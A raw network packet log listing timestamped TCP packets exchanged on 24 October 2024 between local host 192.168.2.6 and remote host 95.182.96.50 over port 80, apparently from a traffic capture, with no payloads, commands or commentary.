Oct 24, 2024 13:54:21.075911045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.075936079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.075972080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.077811003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.077867985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.077868938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.077903986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.077919006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.077939987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.077946901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.077976942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.077982903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078018904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078031063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078068018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078073978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078103065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078109026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078145027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078159094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078193903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078207970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078250885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078280926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078294992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078324080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078336000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078372955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078387976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078409910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078434944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078447104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078452110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078481913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078488111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078516960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078521967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078552961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078588963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078593016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078627110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078661919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078674078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078706026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078712940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078749895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078803062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078807116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078850031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078857899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078891039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078932047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.078944921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.078998089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079004049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079052925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079077959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079091072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079092026 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079138041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079150915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079185009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079195976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079236984 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079242945 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079272032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079277992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079308987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079317093 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079354048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079391956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079427004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079433918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079461098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079471111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079509974 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079514027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079555988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079566002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079602003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079605103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079636097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079646111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079669952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079677105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079724073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079758883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079767942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079793930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079801083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079832077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079859972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079862118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079879045 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079894066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.079917908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.079971075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080004930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080039024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080070972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080106020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080104113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080104113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080138922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080192089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080195904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080195904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080244064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080277920 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080298901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080322027 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080329895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080363989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080398083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080415964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080432892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080456018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080466986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080476999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080503941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080517054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080538034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080560923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080590010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080610037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080631018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080631971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080666065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080703020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080720901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080738068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080740929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080786943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080790997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080835104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080845118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080881119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080914021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080924988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080949068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.080949068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.080985069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081000090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081020117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081027985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081056118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081064939 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081090927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081099987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081125975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081132889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081161022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081166983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081197023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081206083 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081233025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081240892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081268072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081275940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081305027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081310987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081341028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081373930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081386089 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081408978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081418991 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081443071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081478119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081487894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081515074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081548929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081557989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081583977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081619024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081629038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081653118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081672907 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081687927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081692934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081723928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081727028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081759930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081767082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081794977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.081799984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.081835985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.191056967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.191102982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.191140890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.191178083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.191199064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.192825079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193257093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193324089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193367004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193381071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193384886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193418980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193423986 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193456888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193461895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193495989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193536997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193550110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193582058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193625927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193639994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193680048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193707943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193722010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193742037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193746090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193799019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193806887 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193851948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193861961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193913937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193948030 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.193967104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193981886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.193984032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194019079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194025040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194060087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194072008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194106102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194111109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194143057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194147110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194185019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194195032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194231033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194235086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194268942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194282055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194318056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194328070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194353104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194458008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194461107 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194513083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194559097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194566011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194605112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194608927 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194642067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194655895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194675922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194677114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194726944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194734097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194770098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194775105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194808006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194823027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194856882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194884062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194890976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194897890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194926977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194931030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194962025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.194981098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.194996119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195022106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195031881 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195065022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195087910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195100069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195103884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195137024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195147038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195173025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195184946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195225000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195271969 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195277929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195343018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195372105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195422888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195456982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195472956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195492029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195513964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195554972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195564985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195617914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195652008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195666075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195687056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195688009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195720911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195728064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195756912 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195760965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195791960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195848942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195864916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195882082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195898056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195911884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195930958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.195935011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195970058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.195988894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196005106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196022987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196052074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196055889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196090937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196101904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196127892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196144104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196163893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196168900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196198940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196218014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196239948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196259975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196274996 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196291924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196309090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196326971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196353912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196360111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196396112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196402073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196429968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196435928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196466923 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196480989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:21.196508884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:21.196521044 CEST	49714	80	192.168.2.6	95.182.96.50
